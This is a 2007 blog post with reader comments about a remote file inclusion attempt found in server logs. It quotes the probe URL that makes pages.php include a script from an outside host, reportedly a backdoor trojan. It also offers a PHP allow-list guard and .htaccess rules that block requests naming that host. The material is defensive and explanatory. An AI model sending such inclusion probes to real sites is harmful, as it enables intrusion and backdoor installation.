Hack Attempt?

After running through my stats again to see if there are any further holes I can close to limit bandwidth (yes, I'm still on this subject!), I noticed the following had been requested in various guises:

/pages.php?load=http://stoerlein.de/images/kgb.c?

The referenced site contains a whole web page, built mainly from PHP (and with FrontPage as the generator!). Naturally I'm concerned, as it's not an attack I recognise: the request is trying to get pages.php to fetch and include a script from another server. So far the attempts I've seen have just produced a 404; however, without knowing what this script does, it may well run against the right (or, in my case, wrong) file.

So now I'm trying to work out (and have been already, for another reason) how to get .htaccess to inspect the REQUEST_URI and return a 403 if it contains a given string. Unfortunately I've not had much luck yet :(

It's worth checking your stats over once in a while. You never know what you may notice.
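The post wants probes like the one above answered with a 403, and a later comment mentions switching from .htaccess to PHP for the block. As an added example (not the author's own code, which was never posted), here is a guard for a script such as pages.php that does that and, more durably, only ever includes pages from a fixed allow-list, so the parameter can never name a remote or arbitrary local file. It assumes the pages live in a pages/ directory and that `load` is the only parameter used to pick them.

```php
<?php
// Added example, not the blog's own code: guard for a script like pages.php
// that takes a "load" parameter naming the page to include.
// Assumptions: pages live under ./pages/ and $_GET['load'] is the only selector.

declare(strict_types=1);

// A scheme (http://, https://, ftp://, also data: or php:// stream wrappers)
// or a protocol-relative "//host" has no business in a local page name.
// Such values are remote-inclusion probes and get a 403 plus a log line,
// which keeps them distinguishable from ordinary 404s in the stats.
function looksLikeRemoteInclude(string $value): bool
{
    return (bool) preg_match('~^\s*(?:[a-z][a-z0-9+.-]*:|//)~i', $value);
}

// The only pages this script will ever include (assumed names).
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// Map the request parameter to a file path, or null if it must be refused.
function resolvePage(?string $load): ?string
{
    $load = $load ?? 'home';
    if (looksLikeRemoteInclude($load)) {
        return null; // caller answers 403
    }
    // basename() discards any directory part ("../" etc.); the allow-list
    // check is what actually decides, so an unknown name is refused too.
    $key = strtolower(basename($load, '.php'));
    return in_array($key, ALLOWED_PAGES, true) ? __DIR__ . "/pages/$key.php" : null;
}

$file = resolvePage($_GET['load'] ?? null);
if ($file === null) {
    http_response_code(403);
    error_log('Blocked page include: ' . ($_GET['load'] ?? '')
        . ' from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    exit('Forbidden');
}
require $file;
```

With this in place the .htaccess rules in the comments become an optional extra layer rather than the only thing standing between the request and an include of a remote script.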

5 Responses to “Hack Attempt?”

  2. Hmm okay I got my first problem solved (after a day of searching and trying everything I could find or think of!). Yet the same method doesn't want to work for blocking this hack attempt.

    I have

    RedirectMatch 410 ^(.*)stoerlein.de.*$
    RedirectMatch 410 ^(.*)/trackback/$

    The second line works for any trackback URL on a post on this site (which have all been heavily spammed and are now just skewing my stats). However the first line doesn't do anything. I'm only guessing what the above means so it could be badly wrong!

    Anyone a htaccess expert out there?

    By Sarah on Mar 17, 2007

  3. That dot separating the TLD and domain name may need escaping

    By David Salisbury on Mar 19, 2007

  4. Further to that, I'm not sure that you can use query strings with the various Redirect directives. You may need to use something like this:

    RewriteEngine On
    # Test the query string (Redirect directives only see the path); escape the dot and ignore case
    RewriteCond %{QUERY_STRING} stoerlein\.de [NC]
    # "-" leaves the URL untouched; [G] answers 410 Gone (use [F] instead for a 403)
    RewriteRule .* - [G]

    By David Salisbury on Mar 19, 2007

  5. Cheers Dave, I'll give that a go :)

    By Sarah on Mar 20, 2007

  6. Unfortunately the rewrite didn't work despite there being no reason for it not working. Probably the numerous other lines of spam blocking I have in my htaccess!

    Anyhow, PHP to the rescue and in good time as I've had 40 hits today alone with this script from various domains. Apparently it's a backdoor trojan according to a friend's firewall so clearly not a nice script. Still, it's blocked for now. I'll post up the code in the morning.

    I've also had to block visitors with empty user agents (sorry to anyone who has this but I've not spotted any in my server logs). The site was getting hammered today by some bot, so there's another block in place.

    It makes me wonder whether it's worth keeping the site running with receiving more bots than humans as visitors!

    By Sarah on Mar 20, 2007
